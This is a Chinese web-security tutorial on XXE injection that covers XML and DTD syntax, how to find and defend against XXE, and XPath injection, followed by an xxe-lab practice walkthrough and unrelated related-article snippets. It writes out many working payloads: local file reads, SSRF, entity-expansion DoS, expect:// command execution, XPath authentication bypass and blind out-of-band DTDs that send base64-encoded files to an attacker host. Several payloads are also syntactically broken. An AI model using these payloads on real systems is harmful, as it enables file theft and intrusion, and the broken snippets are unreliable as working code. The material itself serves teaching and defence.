当前位置: 首页 > news >正文

[Web安全 网络安全]-XXE 外部实体注入攻击XML

文章目录:

一:前言

1.定义

1.1 XXE

1.2 XML可扩展标记语言

2.DDT文档类型定义

2.1 分类 

2.2 元素element 

DTD元素

DTD属性

2.3 实体entity 

DTD实体类别

DTD实体声明引用

声明:内部 外部 参数实体 公共实体

引用:内部 外部

3.如何找XXE漏洞

4.危害

5.防御

二:利用方式

1.有回显

2.无回显blind xxe 

三:攻击方式

1.XML注入

2.XML外部实体注入(XXE)

2.1 文件读取

2.2 服务器端请求伪造(SSRF)

2.3 拒绝服务(DoS)

2.4 盲XXE

2.5 拒绝服务攻击

2.6 RCE

2.7 XInclude

2.8 端口扫描

2.9 执行命令

3.XPath注入

四:xxelib靶场练习

1.有回显

2.无回显

DNS log方法

盲打http接口数据写入文件方法


一:前言

1.定义

1.1 XXE

定义XXE Injection( XML Exiemal Entity Injection, XML外部实体注入攻击)攻击者可 以通过 XML 的外部实体来获取服务器中本应被保护的数据它允许攻击者通过XML文件或XML处理功能来注入外部实体,进而可能访问或操作服务器上的敏感文件、执行拒绝服务攻击(DoS)、扫描内部网络等在应用程序解析XML输入时,当允许引用外部实体时,可构造恶意内容导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等对于XXE漏洞最为关键的部分是 DTD 文档类型, DTD的作用是定义XML文档的合法构建模块DTD可以在XML文档内声明, 也可以外部引用,libxml2.9.1 及以后, 默认不再解析外部实体出现在XXE漏洞发生在“应用程序解析XML输入时,没有禁止外部实体的加载”,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害XXE漏洞触发的点往往是“可以上传xml文件的位置”,没有对上传的xml文件进行过滤,导致可上传恶意xml文件

举例

<?xml version="1.0" encoding="ISO-8859-1"?>  
<!DOCTYPE foo [  <!ENTITY xxe SYSTEM "file:///etc/passwd">          //定义了一个名为 xxe 的外部实体
]>  
<users>  <user>&xxe;</user>                                 //当这个XML文件被应用程序解析时,&xxe; 实体引用会被替换为 /etc/passwd 文件的内容,从而允许攻击者访问该文件
</users>

1.2 XML可扩展标记语言

XML 教程 

定义:XML指可扩展标记语言,XML被设计用来传输和存储数据,你可以理解为就是一种写法类似于html语言的数据格式文档但是xml跟html是为不同目的而设计的,html旨在显示数据信息,而xml旨在传输数据信息为什么需要XML现实生活中一些数据之间往往存在一定的关系我们希望能在计算机中保存和处理这些数据的同时能够保存和处理他们之间的关系XML就是为了解决这样的需求而产生数据存储格式特点XML用于标记电子文件,使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言XML设计宗旨是存储传输数据,而不是显示数据XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素用途:配置文件、交换数据格式要求XML文档必须有根元素XML文档必须有关闭标签XML标签对大小写敏感XML元素必须被正确的嵌套XML属性必须加引号XML中空格会被保留XML 文档在开头有 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> 的结构这种结构被称为 XML prolog ,用于声明XML文档的版本和编码,是可选的

XML基本格式与基本语法

                            <!--第一部分:XML声明部分-->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>        //xml文件的声明-称为 XML prolog 可选的//standalone值是yes的时候(默认值是no)表示DTD仅用于验证文档结构,从而外部实体将被禁用//若多个字符都需要转义,则可以将这些内容存放到CDATA里面:<![CDATA[ 内容 ]]><!--第二部分:文档类型定义DTD-->
<DOCTYPE note[
<!ENTITY entity-name SYSTEM "url/url">                        //外部实体声明
<!ELEMENT entity-name "内容">                                         //内部实体声明
]><!--第三部分:文档元素-->
<TranInfo>                                                    //根元素<CdtrInf>                                                 //子元素<Id>666</ID><Nm>张三</Nm> </CdtrInf>                       <DbtrInf><Id>888</ID><Nm>李四</Nm>  </DbtrInf>      <Amt>1000</Amt>                
</TranInfo>                                                   //根元素结束

2.DDT文档类型定义

文档类型定义DDT(Document Type Definition )与XML格式相关作用是定义XML文档的合法构建模块,对XML的约束格式规范,也就是说声明了xml的内容格式规范它使用一系列合法的元素来定义文档的结构

2.1 分类 

第一种(element元素):和上面相互对应   元素应该出现的内容

<!DOCTYPE TranInfo[<!DOCTYPE TranInfo(CdtrInf,DbtrInf,Amt)><!DOCTYPE CdtrInfo(Id,Nm)><!DOCTYPE DBtrInfo(Id,Nm)>
]>

第二种(entity实体) :定义被引用的文件或字符,相当于全局变量

<?xml version="1.0" encoding="UTF-8">  
<!DOCTYPE name[
<!ELEMENT name ANY>
<!ELEMENT cs "changesha">                                //内部实体
<!ELEMENT xxe SYSTEM "file:///D:/test/test.dtd">         //外部实体test.dtd    <!DOCTYPE  cs "changesha">]>
]>

可以在其他地方引用这个实体

<?xml version="1.0" encoding="UTF-8">  
<!DOCTYPE name>
<people><name>wangwu</name><area>&cs</area>                //等价于<area>changsha</area>        内部实体<area>&xxe</area>               //等价于<area>changsha</area>        外部实体
</people>

2.2 元素element 

DTD元素
声明一个元素<!ENTITY 元素名称 类别><!ENTITY 元素名称 (元素内容)>
空元素<!ENTITY 元素名称 EMPTY><!ENTITY <br> EMPTY </br>>
只有PCDATA元素<!ENTITY 元素名称 (#PCDATA)><!ENTITY from (#PCDATA)>
带有任何内容的元素<!ENTITY 元素名称 ANY><!ENTITY note ANY>
带有子元素(序列)的元素<!ENTITY 元素名称 (子元素名称1,子元素名称2...)><!ENTITY note (to,from,heading,body)>

PCDATA的意思是:被解析的字符数据

PCDATA是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理,而实体会被展开

被解析的字符数据不应当包含任何&<,或者>字符,需要用&amp; &lt; &gt;实体来分别替换

CDATA意思是:字符数据

CDATA 是不会被解析器解析的文本,在这些文本中的标签不会被当作标记来对待,其中的实体也不会被展开

DTD属性
属性声明语法:<!ATTLIST 元素名称 属性名称 属性类型 默认值> DTD实例:<!ATTLIST payment Luckey CDATA "Q">XML实例:<payment Luckey="Q" />
属性类型描述
属性类型CDATA值为字符数据characher data
(en1|en2|...)此值是枚举列表中的一个值
ID值为唯一的id
IDREF值为另外一个元素的id
IDREFS值为其他id的列表
NMTOKEN值为合法的xml名称
EMTOKENS值为合法的xml名称的列表
ENTITY值是一个实体
ENTITIES值是一个实体列表
NOTATION此值是符号的名称
xml值是一个预定义的xml值
默认属性值#REQUIRED属性值是必要的
#IMPLIED属性值是不必要的
#FIXED value属性值是固定的

2.3 实体entity 

DTD实体类别

DTD实体entity:是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用

按实体有无参分类,实体分为:一般实体、参数实体

内置实体 (Built-in entities):直接用实体名称申明,引用时用&实体名称;只能在DTD中申明,可在xml文档中引用字符实体 (Character entities):直接用实体名称申明,引用时用&实体名称;只能在DTD中申明,可在xml文档中引用通用实体 (General entities):直接用实体名称申明,引用时用&实体名称;只能在DTD中申明,可在xml文档中引用参数实体 (Parameter entities):用%实体名称申明,引用时也用%实体名称;只能在DTD中申明,DTD中引用
DTD实体声明引用
一般实体声明:<!ENTITY 实体名称 "实体内容">引用:&实体名称;可以在DTD中引用,可以在XML中引用,可以在声明前引用,还可以在实体声明内部引用参数实体声明:<!ENTITY % 实体名称 "实体内容">引用:%实体名称;只能在DTD中引用,不能在声明前引用,也不能在实体声明内部引用
声明:内部 外部 参数实体 公共实体

system代表本地计算机、public代表外部公告计算机 

内部实体声明:<!ENTITY 实体名称 "实体的值"><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe "oldboyedu.com">]><foo>&xxe;</foo>外部实体声明:<!ENTITY 实体名称 SYSTEM "URI/URL"><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >]><foo>&xxe;</foo>支持协议libxml2    php                java        .netfile       file               http        filehttp       http               https       httpsftp        ftp                ftp         ftpphp                filecompress.zlib      jarcompress.bzip2     netdocdata               mailtoglob               gopher*phar参数实体声明<!ENTITY % 实体名称 "实体的值">or<!ENTITY % 实体名称 SYSTEM "URI">示例:<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY  % xxe SYSTEM "http://192.168.0.105:8080/evil.dtd" >%xxe;]><foo>&evil;</foo>外部evil.dtd中的内容<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >引用公共实体:<!ENTITY 实体名称 PUBLIC "public_ID" "URI"><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY  % xxe PUBLIC "public_ID" "http://192.168.0.105:8080/evil.dtd" >%xxe;]><foo>&evil;</foo>
引用:内部 外部

 DTD 可以在 XML 文档内声明,也可以外部引用 

DTD内部声明:<!DOCTYPE 根元素 [元素声明]><?xml version="1.0"?><!DOCTYPE note[                                <!--定义此文档是 note 类型的文档--><!ELEMENT note (to,from,heading,body)>         <!--定义note元素有四个元素--><!ELEMENT to (#PCDATA)>                        <!--定义to元素为”#PCDATA”类型--><!ELEMENT from (#PCDATA)>                      <!--定义from元素为”#PCDATA”类型--><!ELEMENT head (#PCDATA)>                      <!--定义head元素为”#PCDATA”类型--><!ELEMENT body (#PCDATA)>                      <!--定义body元素为”#PCDATA”类型-->]><note><to>Y0u</to><from>@re</from><head>v3ry</head><body>g00d!</body></note>引入外部的dtd文件<!DOCTYPE 根元素名称 SYSTEM "外部DTD的URI">
使用外部的dtd文件,引用公共DTD(网络上的dtd文件)<!DOCTYPE 根元素名称 PUBLIC "DTD标识名public_ID" "公用DTD的URI">
当使用外部DTD时,通过如下语法引入<!DOCTYPE root-element SYSTEM "filename"><?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root-element SYSTEM "test.dtd"><note><to>Y0u</to><from>@re</from><head>v3ry</head><body>g00d!</body></note>test.dtd<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE note[<!ELEMENT note(to,from,heading,body)> <!ELEMENT to (#PCDATA)>        <!--定义to元素为”#PCDATA”类型--><!ELEMENT from (#PCDATA)>      <!--定义from元素为”#PCDATA”类型--><!ELEMENT head (#PCDATA)>      <!--定义head元素为”#PCDATA”类型--><!ELEMENT body (#PCDATA)>      <!--定义body元素为”#PCDATA”类型-->]>

3.如何找XXE漏洞

白盒测试:查看代码里面是否使用了LoadXML( )函数黑盒测试抓包看响应体是否存在xml,accept头是否接受xml:https://www.cnblogs.com/mysticbinary/p/12668547.html看到url文件名是否 .ashx后缀扩展名抓包修改数据类型,把json改成xml来传输数据

4.危害

任意文件读取执行系统命令探测内网端口攻击内网网站

5.防御

1、升级php版本2、程序员修改代码PHP:libxml_disable_entity_loader(true);JAVA:DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);setFeature("http://xml.org/sax/features/external-general-entities",false)setFeature("http://xml.org/sax/features/external-parameter-entities",false);Python:from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))3、过滤关键词XML数据<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC4、不允许XML中含有自己定义的DTD5、禁用DTD(文档类型定义)处理:大多数现代应用程序都不需要DTD,因此可以通过配置XML解析器来禁用DTD处理6、限制或禁用外部实体引用:确保XML解析器配置为不允许或限制外部实体引用7、使用安全的库和框架:选择经过良好维护和安全审核的库和框架,并确保它们支持XML的安全处理8、输入验证:对XML输入进行严格的验证,确保它们不包含任何潜在的恶意内容9、更新和补丁:定期更新你的应用程序和库,以确保它们包含最新的安全补丁10、安全编码实践:培训开发人员了解XML注入和其他Web安全漏洞,并遵循最佳的安全编码实践

二:利用方式

1.有回显

可以直接在页面中看到payload的执行结果或现象 

第一种<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >]><foo>&xxe;</foo>第二种<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY %xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >%xxe;]><foo>&evil;</foo>外部evil.dtd中的内容:<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

2.无回显blind xxe 

可以使用外带数据(OOB)通道提取数据。即可以引用远程服务器上的XML文件读取文件 

建立*.dtd:内部的%号要进行实体编码成&#37<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"><!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.13.78:8080/?p=%file;'>">           xml调用<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://ip/test.dtd">%remote;%int;%send;]>

三:攻击方式

1.XML注入

通过利用闭合标签改写XML文件实现的

定义:XML是一种数据组织存储的数据结构方式,安全的XML在用户输入生成新的数据时候应该只能允许用户接受的数据需要过滤掉一些可以改变XML标签也就是说改变XML结构插入新功能(例如新的账户信息,等于添加了账户)的特殊输入,如果没有过滤,则可以导致XML注入攻击前提条件a.用户能够控制数据的输入b.程序有拼凑的数据两大要素标签闭合获取XML表结构注入实例原代码demo.xml<?xml version="1.0" encoding="utf-8"?><manager><admin id="1"><username>admin</username><password>admin</password></admin><admin id="2"><username>root</username><password>root</password></admin></manager>对于上面的xml文件,如果攻击者能够掌控password字段,那么就会产生XML注入admin </password></admin><admin id="3"><name>hack</name><password>hacker</password></admin>现代码:修改后(通过XML注入添加了一个名为hack、密码为:hacker的管理员账户)<?xml version="1.0" encoding="utf-8"?><manager><admin id="1"><name>admin</name><password>admin</password></admin><admin id="2"><username>root</username><password>root</password></admin><admin id="3"><name>hack</name><password>hacker</password></admin></manager>防御:对用户的输入进行过滤转义<            &lt;>            &gt;&            &amp;'            &apos;"            &quot;

2.XML外部实体注入(XXE)

核心思想是通过构造恶意的XML文档来利用应用程序对XML解析的不当处理 

2.1 文件读取

file:///                   #file协议读取文件
http://url/file.txt         #http协议读取站点下的文件
PHP://filter                #文件流形式读取php文件

 攻击者通过在XML中引用外部实体来读取服务器上的敏感文件,如密码文件、配置文件等

<?xml version="1.0" encoding="ISO-8859-1"?>  
<!DOCTYPE foo [  <!ENTITY xxe SYSTEM "file:///etc/passwd">  <!ENTITY bomb "file:///dey/random">                  //读取随机文件XXE的炸弹
]>  
<users>  //&xxe; 实体被解析为 /etc/passwd 文件的内容,该文件包含了系统上的用户账户信息<user>&xxe;</user>  
</users>

2.2 服务器端请求伪造(SSRF)

通过指定一个网络资源的URI作为外部实体的位置,攻击者可以强制服务器向该资源发送请求,进而可能访问到内网中其他受保护的服务

<?xml version="1.0" encoding="ISO-8859-1"?>  
<!DOCTYPE foo [  <!ENTITY xxe SYSTEM "http://internal.example.com/admin/data">          //假设服务器配置允许HTTP请求
]>  
<users>  <user>&xxe;</user>  
</users>

如果XML解析器支持网络资源的解析,并且服务器配置不当,就可能发生此类攻击 

2.3 拒绝服务(DoS)

通过指定一个大量数据的URI作为外部实体,或者指向一个缓慢响应的资源,攻击者可以使服务器忙于处理这些请求,从而消耗大量资源,导致服务不可用

<!DOCTYPE foo [  <!ENTITY bigfile SYSTEM "http://example.com/verybigfile.xml">  
]>  
<data>&bigfile;</data>

2.4 盲XXE

在某些情况下,应用程序可能不会直接返回XML解析的结果,这使得直接的文件读取或数据泄露变得不可能

然而,攻击者利用“盲XXE”攻击,通过外部实体触发服务器上的错误日志记录、DNS查询或其他可观察的副作用来推断信息

<!DOCTYPE foo [  <!ENTITY xxe SYSTEM "http://attacker.com/log?host=VICTIM_IP_HERE">  
]>  
<data>&xxe;</data>

在这个例子中,攻击者控制了一个Web服务器(attacker.com/log),该服务器会记录所有请求的查询参数

通过XXE攻击,攻击者可以强制受害者的服务器向他的服务器发送一个包含受害者IP地址的HTTP请求,从而获取受害者的IP地址信息

2.5 拒绝服务攻击

若解析过程非常缓慢,则表示测试成功,目标站点可能有拒绝服务漏 

<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>

2.6 RCE

在某些情况下,如果目标系统上的其他组件(如Web服务器、数据库、或其他应用程序)存在可被XXE攻击利用的漏洞

并且这些组件能够执行系统命令或允许远程代码执行,那么XXE攻击就可能间接导致RCE 

<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<catalog><core id="test101"><description>&xxe;</description></core>
</catalog>

在这个例子中,&xxe;实体引用了一个外部实体,该实体通过expect://协议尝试执行id命令

如果Web服务器的PHP环境配置不当,允许解析这样的XML文件,并且expect扩展被启用

那么当服务器解析这个XML文件时,它可能会尝试执行id命令,并将命令的输出作为XML文件的一部分进行解析 

2.7 XInclude

XInclude是XML规范的一部分,它允许从子文档中构建XML文档 

<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:include></data>

2.8 端口扫描

<?xml version="1.0" encoding="UTF-8">  
<!DOCTYPE note[
<ENTITY xxe SYSTEM "http://127.0.0.3306">
]>
<login>&xxe</login>

2.9 执行命令

安装php的扩展expect 

<?xml version="1.0" encoding="UTF-8">  
<!DOCTYPE note[
<ENTITY xxe SYSTEM "expect"//ipconfig">
]>
<login>&xxe</login>

3.XPath注入

简介XPath注入攻击是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法它允许攻击者在事先不知道XPath查询相关知识的情况下,通过XPath查询得到一个XML文档的完整内容这种攻击可以有效地对付使用XPath查询(和XML数据库) 来执行身份验证、查找或者其它操作出现地方XPath注入发生在当站点使用用户输入的信息来构造请求以获取XML数据攻击者对站点发送经过特殊构造的信息来探究站点使用的XML是如何构造的,从而进一步获取正常途径下无法获取的数据当XML数据被用作账户验证时,攻击者还可以提升他的权限原理通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作为参数传入Web 应用程序,通过执行XPath查询而执行入侵者想要的操作注入对象不是数据库users表,而是一个存储数据的XML文件因为xpath不存在访问控制,所以不会遇到许多在SQL注入中经常遇到的访问限制注入出现的位置也就是cookie,headers,request parameters/input等直接注入demo.xml(存储用户名和密码)<?xml version="1.0" encoding="UTF-8"?><root><users> <user> <id>1</id><username>test1</username><password>test1</password></user> <user> <id>2</id><username>test2</username><password>test2</password></user></users></root>php(用于接收传入参数,并进行XML查询)<?php$xml=simplexml_load_file('demo.xml');$name=$_GET['name'];$pwd=$_GET['pwd'];$query="/root/users/user[username/text()='".$name."' and    password/text()='".$pwd."']";echo $query;$result=$xml->xpath($query);if($result){echo '<h2>Welcome</h2>';foreach($result as $key=>$value){echo '<br />ID:'.$value->id;echo '<br />Username:'.$value->username;}}?>正常查询:/root/users/user[username/text()='test1'and password/text()='test1']攻击者在username字段中输入:' or 1=1 or ''='变成/root/users/user[username/text()='' or 1=1 or ''='' and password/text()='1']成功获取所有user数据。上面这个字符串会在逻辑上使查询一直返回 true 并将一直允许攻击者访问系统XPath盲注盲注根节点利用count(/*)判断根下节点http://127.0.0.1/xml/2.php?name=' or count(/*) = 1 or '1' = '2利用substring分割根节点的每个字符,猜解第一级节点http://127.0.0.1/xml/2.php?name=' or substring(name(/*[position() = 1]),1,1)='r' or '1'='2http://127.0.0.1/xml/2.php?name=' or substring(name(/*[position() = 1]),2,1)='o' or '1'='2盲注root的下一级节点判断root的下一级节点数http://127.0.0.1/xml/2.php?name=' or count(/root/*) = 1 or '1' = '2猜解root的下一级节点http://127.0.0.1/xml/2.php?name=' or substring(name(/root/*[position() = 1]),1,1)='u' or '1'='2http://127.0.0.1/xml/2.php?name=' or substring(name(/root/*[position() = 1]),2,1)='s' or '1'='2重复上述步骤,直至猜解出所有节点,最后来猜解节点中的数据或属性值危害在URL及表单中提交恶意XPath代码,可获取到权限限制数据的访问权,并可修改这些数据可通过此类漏洞查询获取到系统内部完整的XML文档内容逻辑以及认证被绕过,它不像数据库那样有各种权限,xml没有各种权限的概念,正因为没有权限概念,因此利用xpath构造查询的时候整个数据库都会被用户读取防御数据提交到服务器上端,在服务端正式处理这批数据之前,对提交数据的合法性进行验证。检查提交的数据是否包含特殊字符,对特殊字符进行编码转换或替换、删除敏感字符或字符串。对于系统出现的错误信息,以IE错误编码信息替换,屏蔽系统本身的出错信息。参数化XPath查询,将需要构建的XPath查询表达式,以变量的形式表示,变量不是可以执行的脚本。通过MD5、SSL等加密算法,对于数据敏感信息和在数据传输过程中加密,限制提交非法字符,对输入内容严格检查过滤,参数化XPath查询的变量

四:xxelib靶场练习

靶场地址:GitHub - c0ny1/xxe-lab: 一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo

doLogin.php文件源码

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');//这里面因为没有xml文档所以用的是php的伪协议来获取我们发送的xml文档try{$dom = new DOMDocument();//创建XML的对象$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);//将我们发送的字符串生成xml文档。$creds = simplexml_import_dom($dom);//这一步感觉相当于实例化xml文档$username = $creds->username;//获取username标签的值$password = $creds->password;//获取password标签的值if($username == $USERNAME && $password == $PASSWORD){//将获取的值与前面的进行比较。...$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);//注意必须要有username这个标签,不然的话找不到username,就没有了输出了,我们也不能通过回显来获取信息了}else{$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);//与上方相同,都会输出username的值,都可以达到我们的目的}    
}catch(Exception $e){$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

在该PHP文件中,主要是接收POST请求的内容, 并将其转化为XML对象,然后提取XML对象中的username和password字段。然后比对username和password是否相等 

1.有回显

第一步:输入(账号 1         密码1)

第二步: 利用Burp查看xml代码

<user><username>1</username><password>1</password>
<user>

第三步:加入读取外部实体并引用

<!DOCTYPE a[
<ENTITY xxe SYSTEM "file:///C:Windows/system.ini">
]><user><username>1 &xxe;</username><password>1</password>
<user>

2.无回显

DNS log方法

第一步:dnslog获取子域名

第二步: 查看解析记录

<?xml version="1.0" encoding="UTF-8">  
<!DOCTYPE root[
<ENTITY %remote SYSTEM "wuyatest.wyz90i.dslog.cn">
%remote;
]>

盲打http接口数据写入文件方法

xml<?xml version="1.0" encoding="UTF-8">  <!DOCTYPE ANY[<ENTITY %remote SYSTEM "http://attacker.com/evil.dtd">%remote;]>evil.dtd<!ENTITY % file SYSTEM"php://filter/read=convert.base64-encode/resource=file:///c:/system.ini"><!ENTITY % int "<!ENTITY &#37;send SYSTEM'hppt://192.168.1.42.135:8080?p=%file;'>">

相关文章:

[Web安全 网络安全]-XXE 外部实体注入攻击XML

文章目录&#xff1a; 一&#xff1a;前言 1.定义 1.1 XXE 1.2 XML可扩展标记语言 2.DDT文档类型定义 2.1 分类 2.2 元素element DTD元素 DTD属性 2.3 实体entity DTD实体类别 DTD实体声明引用 声明&#xff1a;内部 外部 参数实体 公共实体 引用&#xff1a;…...

8--苍穹外卖-SpringBoot项目中套餐管理 详解(二)

目录 删除套餐 需求分析和设计 代码开发 根据id查询套餐 mapper层 Service层 ServiceImpl层 Mapper层 批量删除套餐 mapper层 Service层 ServiceImpl层 Mapper层 SetmealMapper.xml 修改套餐 需求分析和设计 代码开发 起售停售套餐 需求分析和设计 代码开发…...

测试面试题:pytest断言时,数据是符点类型,如何断言?

在使用 Pytest 进行断言时&#xff0c;如果数据是浮点类型&#xff0c;可以使用以下方法进行断言&#xff1a; 一、使用pytest.approx pytest.approx可以用来比较两个浮点数是否近似相等。例如&#xff1a; import pytestdef test_float_assertion():result 3.14159expecte…...

Python与MongoDB交互

一、基本概念 MongoDB: 一个面向文档的数据库系统&#xff0c;使用BSON&#xff08;Binary JSON&#xff09;作为存储格式。集合&#xff08;Collection&#xff09;: 类似于关系型数据库中的表&#xff0c;是文档的集合。文档&#xff08;Document&#xff09;: MongoDB中的基…...

安卓AI虚拟女友项目开发的Android开发环境搭建

第五章&#xff1a;Android开发环境搭建与基础入门 5-1 项目讲解思路说明 本文是安卓AI数字虚拟人项目实战的第五章&#xff0c;开发安卓AI安卓版数字虚拟人的Android基础部分。 在本章中&#xff0c;我们将详细介绍如何搭建Android开发环境&#xff0c;包括Android Studio的…...

基于SpringBoot+Vue+MySQL的智能垃圾分类系统

系统展示 用户前台界面 管理员后台界面 系统背景 随着城市化进程的加速&#xff0c;垃圾问题日益凸显&#xff0c;不仅对环境造成污染&#xff0c;也给城市管理带来了巨大挑战。传统的垃圾分类方式不仅费时费力&#xff0c;而且手工操作容易出现错误&#xff0c;导致垃圾分类效…...

你的个人文件管理助手:AI驱动的本地文件整理工具

&#x1f310; 引言 在数字化时代&#xff0c;我们经常面临文件管理的挑战。电脑中的文件杂乱无章&#xff0c;寻找特定文件变得既费时又费力。幸运的是&#xff0c;现在有了一款名为本地文件整理器的神器&#xff0c;它利用AI技术帮助你快速、智能地整理文件&#xff0c;同时…...

【PyTorch】环境配置

框架介绍 Pytorch简介 2017年1月&#xff0c;FAIR&#xff08;Facebook AI Research&#xff09;发布了PyTorch。PyTorch是在Torch基础上用python语言重新打造的一款深度学习框架。Torch是采用Lua语言作为接口的机器学习框架&#xff0c;但因为Lua语言较为小众&#xff0c;导…...

枫叶MTS格式转换器- 强大、操作简单的MTS、M2TS视频转换工具供大家学习研究参考

一款功能强大、操作简单的MTS、M2TS视频转换工具,欢迎下载使用。 使用本MTS格式转换器可以帮助您将索尼和松下等摄像机录制的MTS、M2TS格式高清视频转换为其他流行的视频格式,如MP4、3GP、AVI、MPEG、WMV、ASF、MOV、RM、VCD、SVCD、DVD、MKV、FLV、SWF、MPG、MP3、WAV、WMA…...

Vscode把全部‘def‘都收起来的快捷键

在 VSCode 中&#xff0c;你可以使用以下快捷键来收起所有函数定义 (def)&#xff1a; Windows/Linux: Ctrl K, Ctrl 0macOS: Cmd K, Cmd 0 这个快捷键组合会折叠当前文件中所有的代码块&#xff08;包括所有函数和类定义&#xff09;。你可以通过相同的快捷键再次展开这…...

Web和UE5像素流送、通信教程

一、web端配置 首先打开Github地址&#xff1a;https://github.com/EpicGamesExt/PixelStreamingInfrastructure 找到自己虚幻引擎对应版本的项目并下载下来&#xff0c;我这里用的是5.3。 打开项目找到PixelStreamingInfrastructure-master > Frontend > implementat…...

【YOLO目标检测电梯间电动车与人数据集】共4321张、已标注txt格式、有训练好的yolov5的模型

目录 说明图片示例 说明 数据集格式&#xff1a;YOLO格式 图片数量&#xff1a;4321 标注数量(txt文件个数)&#xff1a;4321 标注类别数&#xff1a;2 标注类别名称&#xff1a;person、electricBicycle 数据集下载&#xff1a;电梯间电动车与人数据集 图片示例 数据…...

【网络安全】公钥基础设施

1. PKI 定义 1.1 公钥基础设施的概念 公钥基础设施&#xff08;Public Key Infrastructure&#xff0c;简称PKI&#xff09;是一种基于公钥密码学的系统&#xff0c;它提供了一套完整的解决方案&#xff0c;用于管理和保护通过互联网传输的信息。PKI的核心功能包括密钥管理、…...

云原生(四十一)| 阿里云ECS服务器介绍

文章目录 阿里云ECS服务器介绍 一、云计算概述 二、什么是公有云 三、公有云优缺点 1、优点 2、缺点 四、公有云品牌 五、市场占有率 六、阿里云ECS概述 七、阿里云ECS特点 阿里云ECS服务器介绍 一、云计算概述 云计算是一种按使用量付费的模式&#xff0c;这种模式…...

计算机网络:计算机网络体系结构 —— OSI 模型 与 TCP/IP 模型

文章目录 计算机网络体系结构OSI 参考模型TCP/IP 参考模型分层的必要性物理层的主要问题数据链路层的主要问题网络层的主要问题运输层的主要问题应用层的主要问题 分层思想的处理方法发送请求路由器转发接受请求发送响应接收响应 计算机网络体系结构 计算机网络体系结构是指将…...

【openwrt-21.02】T750 openwrt switch划分VLAN之后网口插拔状态异常问题分析及解决方案

Openwrt版本 NAME="OpenWrt" VERSION="21.02-SNAPSHOT" ID="openwrt" ID_LIKE="lede openwrt" PRETTY_NAME="OpenWrt 21.02-SNAPSHOT" VERSION_ID="21.02-snapshot" HOME_URL="https://openwrt.org/" …...

C++随心记

C随心记 C中的 CONST C中的const是表示不可修改 int main() {/* 对于变量而言 */// 不可修改的常量const int A 10;// 不可修改的指针指向const int* pointer_0 nullptr;int const* poniter_1 nullptr;// 不可修改指针指向的内容int* const poniter_2 nullptr; }const也…...

【微服务即时通讯系统】——brpc远程过程调用、百度开源的RPC框架、brpc的介绍、brpc的安装、brpc使用和功能测试

文章目录 brpc1. brpc的介绍1.1 rpc的介绍1.2 rpc的原理1.3 grpc和brpc 2. brpc的安装3. brpc使用3.1 brpc接口介绍 4. brpc使用测试4.1 brpc同步和异步调用 brpc 1. brpc的介绍 1.1 rpc的介绍 RPC&#xff08;Remote Procedure Call&#xff09;远程过程调用&#xff0c;是一…...

鸿蒙开发(NEXT/API 12)【状态查询与订阅】手机侧应用开发

注意 该接口的调用需要在开发者联盟申请设备基础信息权限与穿戴用户状态权限&#xff0c;穿戴用户状态权限还需获得用户授权。 实时查询穿戴设备可用空间、电量状态。订阅穿戴设备连接状态、低电量告警、用户心率告警。查询和订阅穿戴设备充电状态、佩戴状态、设备模式。 使…...

vite中sass警告JS API过期

1.问题 在Vite创建项目中引入Sass弹出The legacy JS API is deprecated and will be removed in Dart Sass 2.0.0 - vite中sass警告JS API过期 The legacy JS API is deprecated and will be removed in Dart Sass 2.0.0警告提示表明你当前正在使用的 Dart Sass 版本中&#…...

睢宁自闭症寄宿学校:培养特殊孩子的未来

